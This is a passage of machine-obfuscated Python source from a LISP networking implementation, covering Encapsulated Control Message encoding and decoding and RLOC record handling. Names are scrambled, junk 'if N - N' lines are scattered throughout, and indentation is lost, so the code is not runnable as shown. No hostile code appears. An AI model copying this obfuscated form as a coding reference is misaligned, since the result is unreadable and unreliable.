if 48 - 48: i1IIi - oO0o . OoooooooOO - OoO0O00 - i1IIi
if 19 - 19: oO0o % Ii1I + I1ii11iIi11i . II111iiii * i11iIiiIii
if 87 - 87: Ii1I / I1Ii111 % OoOoOO00 * I1ii11iIi11i - OoooooooOO / OoOoOO00
if 24 - 24: I11i . OOooOOo * i1IIi . I1ii11iIi11i / ooOoO0o / O0
if ( self . eid . afi == LISP_AFI_LCAF ) :
packet , oOoooOOO0o0 = self . eid . lcaf_decode_eid ( packet )
if ( oOoooOOO0o0 ) : self . group = oOoooOOO0o0
self . group . instance_id = self . eid . instance_id
return ( packet )
if 34 - 34: iII111i . OOooOOo
if 13 - 13: OoO0O00 * OOooOOo + oO0o
packet = self . eid . unpack_address ( packet )
return ( packet )
if 21 - 21: i11iIiiIii . Ii1I % i1IIi * Ii1I . oO0o + Ii1I
if 92 - 92: i1IIi + OoO0O00 * I11i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 70 - 70: Oo0Ooo
if 93 - 93: iII111i . I1ii11iIi11i . Oo0Ooo . oO0o . OoooooooOO
if 51 - 51: O0 - iII111i
if 65 - 65: O0 / II111iiii * IiII % Ii1I + o0oOOo0O0Ooo
if 43 - 43: I1Ii111 + OoO0O00 * OoooooooOO
if 85 - 85: iII111i + OOooOOo
if 36 - 36: OoO0O00 % II111iiii * O0 + II111iiii - oO0o - i1IIi
if 53 - 53: Ii1I - OOooOOo
if 75 - 75: iII111i % O0 - I11i - I1ii11iIi11i + I1IiiI - I1IiiI
if 87 - 87: i1IIi % Ii1I % i1IIi + iIii1I11I1II1
if 23 - 23: iIii1I11I1II1 * I11i . I1Ii111 - o0oOOo0O0Ooo
if 66 - 66: I1IiiI * I1Ii111 / i11iIiiIii / OOooOOo
if 19 - 19: ooOoO0o % iIii1I11I1II1 * OoooooooOO
if 60 - 60: I1Ii111 * iII111i / OoooooooOO * Oo0Ooo
if 47 - 47: iII111i + o0oOOo0O0Ooo % iIii1I11I1II1 * OoOoOO00
if 65 - 65: OOooOOo . II111iiii * i11iIiiIii + OOooOOo
if 99 - 99: I1ii11iIi11i % Oo0Ooo
if 31 - 31: o0oOOo0O0Ooo - II111iiii * OOooOOo . OOooOOo - oO0o
if 57 - 57: OOooOOo / i11iIiiIii / I1Ii111 - Oo0Ooo . iIii1I11I1II1
if 84 - 84: IiII
if 42 - 42: O0 . I1Ii111 / I11i
if 69 - 69: OoOoOO00 / I1Ii111 * I1IiiI
if 76 - 76: O0 + II111iiii * OoO0O00
if 1 - 1: o0oOOo0O0Ooo
if 34 - 34: o0oOOo0O0Ooo + OOooOOo . OoO0O00 + I1IiiI + OoooooooOO
if 90 - 90: Ii1I / OoOoOO00 - iIii1I11I1II1 / i1IIi * I1Ii111 - ooOoO0o
if 2 - 2: iII111i * I11i * ooOoO0o + i11iIiiIii + oO0o
if 81 - 81: o0oOOo0O0Ooo * OoO0O00
if 18 - 18: i11iIiiIii / o0oOOo0O0Ooo - oO0o . I11i * i1IIi
if 67 - 67: Ii1I
if 64 - 64: OoOoOO00 + iII111i * OoOoOO00 - I1IiiI * OoooooooOO
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
if 27 - 27: II111iiii + i11iIiiIii
class lisp_ecm ( ) :
def __init__ ( self , sport ) :
self . security = False
self . ddt = False
self . to_etr = False
self . to_ms = False
self . length = 0
self . ttl = LISP_DEFAULT_ECM_TTL
self . protocol = LISP_UDP_PROTOCOL
self . ip_checksum = 0
self . source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . udp_sport = sport
self . udp_dport = LISP_CTRL_PORT
self . udp_checksum = 0
self . udp_length = 0
self . afi = LISP_AFI_NONE
if 32 - 32: i1IIi
if 76 - 76: II111iiii % ooOoO0o - I1ii11iIi11i
def print_ecm ( self ) :
I111 = ( "{} -> flags: {}{}{}{}, " + "inner IP: {} -> {}, inner UDP: {} -> {}" )
if 50 - 50: II111iiii / I1IiiI . Ii1I % i11iIiiIii
lprint ( I111 . format ( bold ( "ECM" , False ) , "S" if self . security else "s" ,
"D" if self . ddt else "d" , "E" if self . to_etr else "e" ,
"M" if self . to_ms else "m" ,
green ( self . source . print_address ( ) , False ) ,
green ( self . dest . print_address ( ) , False ) , self . udp_sport ,
self . udp_dport ) )
if 66 - 66: oO0o / OOooOOo / iII111i
def encode ( self , packet , inner_source , inner_dest ) :
self . udp_length = len ( packet ) + 8
self . source = inner_source
self . dest = inner_dest
if ( inner_dest . is_ipv4 ( ) ) :
self . afi = LISP_AFI_IPV4
self . length = self . udp_length + 20
if 5 - 5: I1Ii111 . oO0o
if ( inner_dest . is_ipv6 ( ) ) :
self . afi = LISP_AFI_IPV6
self . length = self . udp_length
if 77 - 77: iII111i / i11iIiiIii
if 20 - 20: O0 . I11i
if 67 - 67: OoOoOO00 - ooOoO0o - iIii1I11I1II1
if 31 - 31: II111iiii + o0oOOo0O0Ooo * i11iIiiIii . o0oOOo0O0Ooo
if 73 - 73: oO0o / OOooOOo * II111iiii % OoooooooOO - i1IIi - ooOoO0o
if 43 - 43: o0oOOo0O0Ooo + Ii1I % OoO0O00 . I1Ii111 + i1IIi
i1IiIiiiii11 = ( LISP_ECM << 28 )
if ( self . security ) : i1IiIiiiii11 |= 0x08000000
if ( self . ddt ) : i1IiIiiiii11 |= 0x04000000
if ( self . to_etr ) : i1IiIiiiii11 |= 0x02000000
if ( self . to_ms ) : i1IiIiiiii11 |= 0x01000000
if 85 - 85: Oo0Ooo % I1ii11iIi11i / OOooOOo
O0O00O = struct . pack ( "I" , socket . htonl ( i1IiIiiiii11 ) )
if 51 - 51: Oo0Ooo . Oo0Ooo
iIiiIIi = ""
if ( self . afi == LISP_AFI_IPV4 ) :
iIiiIIi = struct . pack ( "BBHHHBBH" , 0x45 , 0 , socket . htons ( self . length ) ,
0 , 0 , self . ttl , self . protocol , socket . htons ( self . ip_checksum ) )
iIiiIIi += self . source . pack_address ( )
iIiiIIi += self . dest . pack_address ( )
iIiiIIi = lisp_ip_checksum ( iIiiIIi )
if 34 - 34: I1ii11iIi11i - i11iIiiIii
if ( self . afi == LISP_AFI_IPV6 ) :
iIiiIIi = struct . pack ( "BBHHBB" , 0x60 , 0 , 0 , socket . htons ( self . length ) ,
self . protocol , self . ttl )
iIiiIIi += self . source . pack_address ( )
iIiiIIi += self . dest . pack_address ( )
if 43 - 43: iIii1I11I1II1
if 73 - 73: OoOoOO00 + o0oOOo0O0Ooo
o0 = socket . htons ( self . udp_sport )
Ii = socket . htons ( self . udp_dport )
o0000oO = socket . htons ( self . udp_length )
ii1i1 = socket . htons ( self . udp_checksum )
O0OO0ooO00 = struct . pack ( "HHHH" , o0 , Ii , o0000oO , ii1i1 )
return ( O0O00O + iIiiIIi + O0OO0ooO00 )
if 58 - 58: i1IIi * I1ii11iIi11i % iII111i . OoO0O00 % IiII % I11i
if 63 - 63: I1ii11iIi11i % ooOoO0o % I1ii11iIi11i
def decode ( self , packet ) :
if 71 - 71: Ii1I
if 43 - 43: o0oOOo0O0Ooo / ooOoO0o
if 88 - 88: i11iIiiIii - i1IIi + Oo0Ooo - O0
if 50 - 50: I1ii11iIi11i
o00OooooOOOO = "I"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 37 - 37: oO0o % iII111i / II111iiii / OoO0O00 - IiII - ooOoO0o
i1IiIiiiii11 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 69 - 69: I1ii11iIi11i . OoooooooOO % I1Ii111
i1IiIiiiii11 = socket . ntohl ( i1IiIiiiii11 [ 0 ] )
self . security = True if ( i1IiIiiiii11 & 0x08000000 ) else False
self . ddt = True if ( i1IiIiiiii11 & 0x04000000 ) else False
self . to_etr = True if ( i1IiIiiiii11 & 0x02000000 ) else False
self . to_ms = True if ( i1IiIiiiii11 & 0x01000000 ) else False
packet = packet [ oO0o00O : : ]
if 79 - 79: I1IiiI - IiII . OoooooooOO - I1ii11iIi11i
if 79 - 79: OOooOOo + o0oOOo0O0Ooo % iII111i . oO0o
if 49 - 49: Ii1I + i11iIiiIii * OoOoOO00 . OoOoOO00 . I1ii11iIi11i . Oo0Ooo
if 61 - 61: I11i / OOooOOo
if ( len ( packet ) < 1 ) : return ( None )
Oo0o0OoOoOo0 = struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ]
Oo0o0OoOoOo0 = Oo0o0OoOoOo0 >> 4
if 85 - 85: OoOoOO00 - I11i . OoOoOO00 . OoOoOO00
if ( Oo0o0OoOoOo0 == 4 ) :
oO0o00O = struct . calcsize ( "HHIBBH" )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 62 - 62: IiII % OoooooooOO * OoO0O00 + OoO0O00 % Ii1I % iII111i
OoOO0OOOO0 , o0000oO , OoOO0OOOO0 , OooOOo0ooO , iIiiI11II11 , ii1i1 = struct . unpack ( "HHIBBH" , packet [ : oO0o00O ] )
self . length = socket . ntohs ( o0000oO )
self . ttl = OooOOo0ooO
self . protocol = iIiiI11II11
self . ip_checksum = socket . ntohs ( ii1i1 )
self . source . afi = self . dest . afi = LISP_AFI_IPV4
if 6 - 6: OoooooooOO . oO0o / i11iIiiIii / ooOoO0o + oO0o . Oo0Ooo
if 94 - 94: i11iIiiIii . IiII - OoO0O00 + O0
if 89 - 89: iII111i * oO0o
if 36 - 36: ooOoO0o / II111iiii - ooOoO0o * iII111i
iIiiI11II11 = struct . pack ( "H" , 0 )
I1iiiiiII1I1I = struct . calcsize ( "HHIBB" )
o0OoO00ooOoO = struct . calcsize ( "H" )
packet = packet [ : I1iiiiiII1I1I ] + iIiiI11II11 + packet [ I1iiiiiII1I1I + o0OoO00ooOoO : ]
if 93 - 93: ooOoO0o - OoooooooOO / IiII . I11i
packet = packet [ oO0o00O : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 7 - 7: o0oOOo0O0Ooo % Ii1I - i11iIiiIii
if 47 - 47: Oo0Ooo / OoOoOO00
if ( Oo0o0OoOoOo0 == 6 ) :
oO0o00O = struct . calcsize ( "IHBB" )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 26 - 26: I11i . I1ii11iIi11i
OoOO0OOOO0 , o0000oO , iIiiI11II11 , OooOOo0ooO = struct . unpack ( "IHBB" , packet [ : oO0o00O ] )
self . length = socket . ntohs ( o0000oO )
self . protocol = iIiiI11II11
self . ttl = OooOOo0ooO
self . source . afi = self . dest . afi = LISP_AFI_IPV6
if 55 - 55: OoOoOO00 * I1Ii111 % OoO0O00 - OoO0O00
packet = packet [ oO0o00O : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 34 - 34: O0 * OoO0O00 - oO0o - IiII * Ii1I . II111iiii
if 28 - 28: O0 % iII111i - i1IIi
self . source . mask_len = self . source . host_mask_len ( )
self . dest . mask_len = self . dest . host_mask_len ( )
if 49 - 49: ooOoO0o . I11i - iIii1I11I1II1
oO0o00O = struct . calcsize ( "HHHH" )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 41 - 41: ooOoO0o * i11iIiiIii % ooOoO0o . oO0o
o0 , Ii , o0000oO , ii1i1 = struct . unpack ( "HHHH" , packet [ : oO0o00O ] )
self . udp_sport = socket . ntohs ( o0 )
self . udp_dport = socket . ntohs ( Ii )
self . udp_length = socket . ntohs ( o0000oO )
self . udp_checksum = socket . ntohs ( ii1i1 )
packet = packet [ oO0o00O : : ]
return ( packet )
if 97 - 97: oO0o - iII111i + IiII . OoOoOO00 + iIii1I11I1II1
if 75 - 75: ooOoO0o + ooOoO0o . I1Ii111 % iII111i / iIii1I11I1II1 * iII111i
if 13 - 13: II111iiii * i11iIiiIii - i1IIi * OoO0O00 + i1IIi
if 43 - 43: O0 % oO0o * I1IiiI
if 64 - 64: II111iiii + i11iIiiIii
if 17 - 17: O0 * I1IiiI
if 40 - 40: iIii1I11I1II1 * iII111i % iIii1I11I1II1
if 39 - 39: i1IIi . Ii1I - Oo0Ooo
if 91 - 91: I1IiiI - OoooooooOO - OoooooooOO
if 69 - 69: iII111i * i11iIiiIii / i1IIi
if 86 - 86: I1IiiI % I11i * O0 + i1IIi % I1Ii111
if 97 - 97: II111iiii * OoOoOO00 - I1Ii111 / i11iIiiIii / OoOoOO00
if 25 - 25: Oo0Ooo / Oo0Ooo
if 74 - 74: OOooOOo
if 30 - 30: O0 . Ii1I / o0oOOo0O0Ooo + I1IiiI - O0
if 88 - 88: i11iIiiIii
if 33 - 33: OoO0O00 + O0
if 20 - 20: o0oOOo0O0Ooo % I11i . ooOoO0o - i1IIi . O0
if 10 - 10: i1IIi
if 49 - 49: I1Ii111 - Ii1I . O0
if 46 - 46: OOooOOo
if 64 - 64: I1IiiI / OoOoOO00
if 6 - 6: i11iIiiIii - iII111i * i1IIi - iII111i
if 8 - 8: I11i / i11iIiiIii . O0 / OoO0O00 * oO0o + I1Ii111
if 91 - 91: I1IiiI
if 84 - 84: O0 % Ii1I
if 3 - 3: I1IiiI . I11i / I1ii11iIi11i
if 2 - 2: IiII + I11i / iIii1I11I1II1 . i11iIiiIii . i1IIi * ooOoO0o
if 14 - 14: Oo0Ooo . O0 - oO0o - i11iIiiIii
if 8 - 8: I1IiiI / iIii1I11I1II1 / OoooooooOO / Oo0Ooo / ooOoO0o
if 80 - 80: I11i
if 26 - 26: II111iiii + I1IiiI . II111iiii - oO0o % OoO0O00
if 1 - 1: OoO0O00 - II111iiii
if 75 - 75: Oo0Ooo - OoOoOO00 + oO0o % i1IIi * OOooOOo
if 56 - 56: OoOoOO00 / OoO0O00 / I1IiiI % OoooooooOO
if 39 - 39: I1IiiI + II111iiii * Oo0Ooo % Ii1I . o0oOOo0O0Ooo * oO0o
if 42 - 42: Ii1I / Oo0Ooo
if 25 - 25: OoooooooOO % Ii1I * I1Ii111 * I11i + I1IiiI % I1ii11iIi11i
if 70 - 70: Ii1I + I1ii11iIi11i * I11i * i1IIi . I1Ii111
if 76 - 76: OoooooooOO * OoOoOO00 . OoooooooOO
if 46 - 46: ooOoO0o * o0oOOo0O0Ooo % II111iiii / I1Ii111
if 29 - 29: OoO0O00 - i11iIiiIii % Oo0Ooo % o0oOOo0O0Ooo
if 30 - 30: oO0o - Ii1I % Ii1I
if 8 - 8: IiII
if 68 - 68: IiII . OoooooooOO - i11iIiiIii + i11iIiiIii
if 81 - 81: OoOoOO00 + iII111i . i11iIiiIii
if 10 - 10: OoOoOO00 + I11i - iIii1I11I1II1 - I11i
if 58 - 58: ooOoO0o
if 98 - 98: Ii1I / OoO0O00 % OoooooooOO
if 65 - 65: ooOoO0o % Oo0Ooo - I1IiiI % I1Ii111 + iIii1I11I1II1 / iIii1I11I1II1
if 94 - 94: IiII - Oo0Ooo . o0oOOo0O0Ooo - ooOoO0o - oO0o . I11i
if 39 - 39: oO0o + OoOoOO00
if 68 - 68: i1IIi * oO0o / i11iIiiIii
if 96 - 96: I1IiiI
if 78 - 78: OoO0O00
if 72 - 72: I1ii11iIi11i / O0 % II111iiii / II111iiii
if 48 - 48: OOooOOo % OOooOOo / iIii1I11I1II1 - i11iIiiIii
if 57 - 57: I11i / IiII * i1IIi + II111iiii . o0oOOo0O0Ooo
if 11 - 11: II111iiii
if 66 - 66: Ii1I - I1IiiI . OoooooooOO * I1Ii111
if 16 - 16: IiII * OoO0O00 * i11iIiiIii - ooOoO0o
if 88 - 88: iIii1I11I1II1 / Ii1I * IiII / I1Ii111
if 31 - 31: O0 . I1IiiI
if 8 - 8: OoOoOO00
if 99 - 99: iII111i
if 93 - 93: I1Ii111
if 39 - 39: Ii1I
if 10 - 10: OoOoOO00 . iIii1I11I1II1 / I1ii11iIi11i % iII111i / i11iIiiIii
if 14 - 14: i11iIiiIii % o0oOOo0O0Ooo * O0 % iIii1I11I1II1 . IiII - II111iiii
if 14 - 14: Ii1I % ooOoO0o - OoOoOO00
if 52 - 52: OoO0O00 / i1IIi - Ii1I
if 8 - 8: oO0o + ooOoO0o . I1ii11iIi11i . i1IIi / I1IiiI . IiII
if 8 - 8: i1IIi * O0
if 60 - 60: Oo0Ooo - II111iiii + I1IiiI
if 17 - 17: OoOoOO00 % I1IiiI
if 8 - 8: Oo0Ooo
if 49 - 49: OoOoOO00 * I11i - o0oOOo0O0Ooo / OoO0O00 * oO0o
if 51 - 51: ooOoO0o - iIii1I11I1II1 . I11i * OoOoOO00 + I1Ii111 * i1IIi
if 37 - 37: IiII * oO0o / OoooooooOO . OoO0O00
if 77 - 77: II111iiii + OoOoOO00 * OOooOOo
if 9 - 9: II111iiii - i11iIiiIii * o0oOOo0O0Ooo % OoO0O00 * i11iIiiIii / I11i
if 45 - 45: i11iIiiIii * iII111i - I1ii11iIi11i + ooOoO0o % iII111i
if 11 - 11: iIii1I11I1II1
if 48 - 48: iIii1I11I1II1 - Oo0Ooo
if 80 - 80: i1IIi
if 56 - 56: II111iiii - o0oOOo0O0Ooo
if 48 - 48: Oo0Ooo - I1ii11iIi11i - II111iiii . Ii1I . oO0o / iIii1I11I1II1
if 38 - 38: I1Ii111 % i11iIiiIii + Ii1I * ooOoO0o / I1Ii111
if 93 - 93: oO0o
if 60 - 60: I1Ii111 . oO0o / Oo0Ooo * ooOoO0o + OoOoOO00 - i1IIi
if 13 - 13: i11iIiiIii * oO0o / I11i * I1IiiI
if 31 - 31: iIii1I11I1II1 * Ii1I % OOooOOo . II111iiii
if 56 - 56: IiII / i11iIiiIii . o0oOOo0O0Ooo . oO0o - i11iIiiIii
if 23 - 23: I1ii11iIi11i * i11iIiiIii % ooOoO0o
if 47 - 47: iIii1I11I1II1 . OOooOOo / I11i % II111iiii
if 92 - 92: I1ii11iIi11i % i11iIiiIii
if 82 - 82: I1Ii111 * I1ii11iIi11i % Ii1I / o0oOOo0O0Ooo
if 28 - 28: iII111i % OoO0O00 - OOooOOo - Oo0Ooo
if 16 - 16: i11iIiiIii - i11iIiiIii . OoOoOO00 / i1IIi
if 76 - 76: O0 * OoO0O00 / O0
if 23 - 23: I1ii11iIi11i . iIii1I11I1II1 - i11iIiiIii / II111iiii
if 48 - 48: oO0o - II111iiii * I1IiiI
if 78 - 78: I1IiiI * i11iIiiIii * II111iiii
if 19 - 19: OoooooooOO * i11iIiiIii / O0 . I1IiiI % I11i
if 35 - 35: iIii1I11I1II1 + I1IiiI - ooOoO0o / Oo0Ooo * I1ii11iIi11i * Oo0Ooo
if 17 - 17: OoOoOO00
if 24 - 24: iIii1I11I1II1 / OOooOOo % OoooooooOO / O0 / oO0o
if 93 - 93: Oo0Ooo
if 5 - 5: iII111i
if 61 - 61: OOooOOo * OoO0O00 - O0
if 30 - 30: iIii1I11I1II1
if 14 - 14: o0oOOo0O0Ooo + Ii1I
if 91 - 91: OoooooooOO / oO0o + OoOoOO00
if 100 - 100: i1IIi
if 13 - 13: i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo
if 31 - 31: i11iIiiIii % OoO0O00 . i11iIiiIii % oO0o - i1IIi
if 62 - 62: oO0o + oO0o . OoooooooOO
class lisp_rloc_record ( ) :
def __init__ ( self ) :
self . priority = 0
self . weight = 0
self . mpriority = 0
self . mweight = 0
self . local_bit = False
self . probe_bit = False
self . reach_bit = False
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . rloc_name = None
self . keys = None
if 59 - 59: iIii1I11I1II1 . Oo0Ooo * I11i
if 29 - 29: Oo0Ooo - I1IiiI * I11i
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
Ooo000oo0OO0 = self . rloc_name
if ( cour ) : Ooo000oo0OO0 = lisp_print_cour ( Ooo000oo0OO0 )
return ( 'rloc-name: {}' . format ( blue ( Ooo000oo0OO0 , cour ) ) )
if 54 - 54: I1IiiI
if 29 - 29: OoO0O00 * iIii1I11I1II1 % Ii1I / oO0o / I1Ii111
def print_record ( self , indent ) :
ii11IiI = self . print_rloc_name ( )
if ( ii11IiI != "" ) : ii11IiI = ", " + ii11IiI
OOOOooO0Oo0oo = ""
if ( self . geo ) :
oOo0oooo = ""
if ( self . geo . geo_name ) : oOo0oooo = "'{}' " . format ( self . geo . geo_name )
OOOOooO0Oo0oo = ", geo: {}{}" . format ( oOo0oooo , self . geo . print_geo ( ) )
if 48 - 48: i11iIiiIii * OoOoOO00 - I1IiiI + iIii1I11I1II1
iIii1IiI = ""
if ( self . elp ) :
oOo0oooo = ""
if ( self . elp . elp_name ) : oOo0oooo = "'{}' " . format ( self . elp . elp_name )
iIii1IiI = ", elp: {}{}" . format ( oOo0oooo , self . elp . print_elp ( True ) )
if 42 - 42: II111iiii . I1IiiI . i11iIiiIii . OoOoOO00 % I1Ii111 + I1ii11iIi11i
Oo0iIIIIi = ""
if ( self . rle ) :
oOo0oooo = ""
if ( self . rle . rle_name ) : oOo0oooo = "'{}' " . format ( self . rle . rle_name )
Oo0iIIIIi = ", rle: {}{}" . format ( oOo0oooo , self . rle . print_rle ( False ) )
if 48 - 48: iIii1I11I1II1 % i1IIi - OoO0O00 % IiII - i1IIi + o0oOOo0O0Ooo
i111i = ""
if ( self . json ) :
oOo0oooo = ""
if ( self . json . json_name ) :
oOo0oooo = "'{}' " . format ( self . json . json_name )
if 43 - 43: IiII + IiII
i111i = ", json: {}" . format ( self . json . print_json ( False ) )
if 88 - 88: OoOoOO00 % I1IiiI * I1IiiI
if 97 - 97: iII111i + I1IiiI % oO0o % II111iiii * II111iiii + OoO0O00
I11iIiiI = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
I11iIiiI = ", " + self . keys [ 1 ] . print_keys ( )
if 13 - 13: o0oOOo0O0Ooo / iIii1I11I1II1 + O0 % OoO0O00
if 13 - 13: OoOoOO00 + i1IIi - I1IiiI
I111 = ( "{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}" )
lprint ( I111 . format ( indent , self . print_flags ( ) , self . priority ,
self . weight , self . mpriority , self . mweight , self . rloc . afi ,
red ( self . rloc . print_address_no_iid ( ) , False ) , ii11IiI , OOOOooO0Oo0oo ,
iIii1IiI , Oo0iIIIIi , i111i , I11iIiiI ) )
if 3 - 3: II111iiii % IiII * O0
if 58 - 58: OOooOOo * I1Ii111
def print_flags ( self ) :
return ( "{}{}{}" . format ( "L" if self . local_bit else "l" , "P" if self . probe_bit else "p" , "R" if self . reach_bit else "r" ) )
if 19 - 19: OoOoOO00 / IiII - OOooOOo * i11iIiiIii % I1Ii111
if 98 - 98: IiII + IiII + OOooOOo / i1IIi + oO0o
if 53 - 53: OoOoOO00
def store_rloc_entry ( self , rloc_entry ) :
OooO0ooO0o0OO = rloc_entry . rloc if ( rloc_entry . translated_rloc . is_null ( ) ) else rloc_entry . translated_rloc
if 73 - 73: OoooooooOO
self . rloc . copy_address ( OooO0ooO0o0OO )
if 64 - 64: Ii1I * OoO0O00 % O0 . Ii1I . OoooooooOO
if ( rloc_entry . rloc_name ) :
self . rloc_name = rloc_entry . rloc_name
if 83 - 83: I11i * o0oOOo0O0Ooo - Oo0Ooo / ooOoO0o / i1IIi - Ii1I
if 43 - 43: i11iIiiIii - OoooooooOO % ooOoO0o
if ( rloc_entry . geo ) :
self . geo = rloc_entry . geo
else :
oOo0oooo = rloc_entry . geo_name
if ( oOo0oooo and lisp_geo_list . has_key ( oOo0oooo ) ) :
self . geo = lisp_geo_list [ oOo0oooo ]
if 55 - 55: oO0o % Oo0Ooo % IiII
if 65 - 65: IiII * IiII
if ( rloc_entry . elp ) :
self . elp = rloc_entry . elp
else :
oOo0oooo = rloc_entry . elp_name
if ( oOo0oooo and lisp_elp_list . has_key ( oOo0oooo ) ) :
self . elp = lisp_elp_list [ oOo0oooo ]
if 60 - 60: ooOoO0o
if 92 - 92: O0 % IiII
if ( rloc_entry . rle ) :
self . rle = rloc_entry . rle
else :
oOo0oooo = rloc_entry . rle_name
if ( oOo0oooo and lisp_rle_list . has_key ( oOo0oooo ) ) :
self . rle = lisp_rle_list [ oOo0oooo ]
if 15 - 15: O0 % i1IIi - OOooOOo . IiII
if 1 - 1: I1IiiI
if ( rloc_entry . json ) :
self . json = rloc_entry . json
else :
oOo0oooo = rloc_entry . json_name
if ( oOo0oooo and lisp_json_list . has_key ( oOo0oooo ) ) :
self . json = lisp_json_list [ oOo0oooo ]
if 40 - 40: o0oOOo0O0Ooo % I11i % O0
if 88 - 88: o0oOOo0O0Ooo - oO0o
self . priority = rloc_entry . priority
self . weight = rloc_entry . weight
self . mpriority = rloc_entry . mpriority
self . mweight = rloc_entry . mweight
if 73 - 73: II111iiii
if 7 - 7: O0 / OoO0O00
def encode_lcaf ( self ) :
I1I1iiI1iIIii = socket . htons ( LISP_AFI_LCAF )
o0oOoOoooO = ""
if ( self . geo ) :
o0oOoOoooO = self . geo . encode_geo ( )
if 20 - 20: I1Ii111 . I1IiiI - iIii1I11I1II1 / iII111i
if 46 - 46: I1Ii111 . i11iIiiIii
OOO0Oo0Oo = ""
if ( self . elp ) :
oOOoO0OO0OOoo = ""
for Oo0ooOOOOOoO in self . elp . elp_nodes :
oO0oO00 = socket . htons ( Oo0ooOOOOOoO . address . afi )
OO000OOO = 0
if ( Oo0ooOOOOOoO . eid ) : OO000OOO |= 0x4
if ( Oo0ooOOOOOoO . probe ) : OO000OOO |= 0x2
if ( Oo0ooOOOOOoO . strict ) : OO000OOO |= 0x1
OO000OOO = socket . htons ( OO000OOO )
oOOoO0OO0OOoo += struct . pack ( "HH" , OO000OOO , oO0oO00 )
oOOoO0OO0OOoo += Oo0ooOOOOOoO . address . pack_address ( )
if 37 - 37: OOooOOo / Ii1I
if 51 - 51: OOooOOo + O0
Oo0OoO = socket . htons ( len ( oOOoO0OO0OOoo ) )
OOO0Oo0Oo = struct . pack ( "HBBBBH" , I1I1iiI1iIIii , 0 , 0 , LISP_LCAF_ELP_TYPE ,
0 , Oo0OoO )
OOO0Oo0Oo += oOOoO0OO0OOoo
if 55 - 55: iII111i / i11iIiiIii % I1IiiI % OoooooooOO
if 83 - 83: OoO0O00 % I1ii11iIi11i
oOo0Ooo = ""
if ( self . rle ) :
Ii1III1 = ""
for Oo0000O00o0 in self . rle . rle_nodes :
oO0oO00 = socket . htons ( Oo0000O00o0 . address . afi )
Ii1III1 += struct . pack ( "HBBH" , 0 , 0 , Oo0000O00o0 . level , oO0oO00 )
Ii1III1 += Oo0000O00o0 . address . pack_address ( )
if ( Oo0000O00o0 . rloc_name ) :
Ii1III1 += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
Ii1III1 += Oo0000O00o0 . rloc_name + "\0"
if 51 - 51: iIii1I11I1II1
if 74 - 74: OoooooooOO * O0 % O0 + O0
if 83 - 83: OoooooooOO / OoOoOO00 % ooOoO0o * OOooOOo + iII111i
o000000 = socket . htons ( len ( Ii1III1 ) )
oOo0Ooo = struct . pack ( "HBBBBH" , I1I1iiI1iIIii , 0 , 0 , LISP_LCAF_RLE_TYPE ,
0 , o000000 )
oOo0Ooo += Ii1III1
if 59 - 59: I11i + Ii1I + OoO0O00
if 46 - 46: I11i - Oo0Ooo
ooOOo0oo00O = ""
if ( self . json ) :
o00O0oOO0o = socket . htons ( len ( self . json . json_string ) + 2 )
O0000000oooOO = socket . htons ( len ( self . json . json_string ) )
ooOOo0oo00O = struct . pack ( "HBBBBHH" , I1I1iiI1iIIii , 0 , 0 , LISP_LCAF_JSON_TYPE ,
0 , o00O0oOO0o , O0000000oooOO )
ooOOo0oo00O += self . json . json_string
ooOOo0oo00O += struct . pack ( "H" , 0 )
if 79 - 79: OoooooooOO * I1ii11iIi11i * i1IIi % oO0o
if 2 - 2: OOooOOo
iiI1i = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
iiI1i = self . keys [ 1 ] . encode_lcaf ( self . rloc )
if 75 - 75: O0
if 71 - 71: i11iIiiIii + OoO0O00 . I11i - iII111i % I1ii11iIi11i * IiII
oO0O0 = ""
if ( self . rloc_name ) :
oO0O0 += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
oO0O0 += self . rloc_name + "\0"
if 61 - 61: I1ii11iIi11i
if 48 - 48: II111iiii
III11ii1 = len ( o0oOoOoooO ) + len ( OOO0Oo0Oo ) + len ( oOo0Ooo ) + len ( iiI1i ) + 2 + len ( ooOOo0oo00O ) + self . rloc . addr_length ( ) + len ( oO0O0 )
if 10 - 10: iIii1I11I1II1 + OoO0O00 - o0oOOo0O0Ooo . o0oOOo0O0Ooo / IiII / I1Ii111
III11ii1 = socket . htons ( III11ii1 )
oo0 = struct . pack ( "HBBBBHH" , I1I1iiI1iIIii , 0 , 0 , LISP_LCAF_AFI_LIST_TYPE ,
0 , III11ii1 , socket . htons ( self . rloc . afi ) )
oo0 += self . rloc . pack_address ( )
return ( oo0 + oO0O0 + o0oOoOoooO + OOO0Oo0Oo + oOo0Ooo + iiI1i + ooOOo0oo00O )
if 69 - 69: i11iIiiIii - i11iIiiIii + I11i / I1IiiI % I1ii11iIi11i
if 56 - 56: iIii1I11I1II1 / OoO0O00 * OOooOOo
def encode ( self ) :
OO000OOO = 0
if ( self . local_bit ) : OO000OOO |= 0x0004
if ( self . probe_bit ) : OO000OOO |= 0x0002
if ( self . reach_bit ) : OO000OOO |= 0x0001
if 73 - 73: OoooooooOO % IiII / I1Ii111 * I11i + i1IIi % i11iIiiIii
